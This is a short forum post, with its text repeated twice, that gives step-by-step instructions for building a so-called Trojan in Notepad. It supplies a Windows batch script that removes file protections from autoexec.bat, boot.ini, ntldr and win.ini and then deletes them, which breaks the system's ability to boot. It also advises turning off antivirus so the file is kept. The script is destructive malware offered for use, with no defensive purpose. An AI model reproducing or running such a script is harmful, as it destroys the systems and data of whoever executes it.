ooonemilliooon
Enthusiast
How to make a Trojan Virus in Notepad
1. Open notepad
2. Paste this code
echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
3. Save as .bat file
Done
NOTE : ( The antivirus will automaticly delete this file. Turn of the antivirus if you want to save it. And DON'T OPEN the file !!!
Use it on your own Risk)
-ooonemilliooon
1. Open notepad
2. Paste this code
echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
3. Save as .bat file
Done
NOTE : ( The antivirus will automaticly delete this file. Turn of the antivirus if you want to save it. And DON'T OPEN the file !!!
Use it on your own Risk)
-ooonemilliooon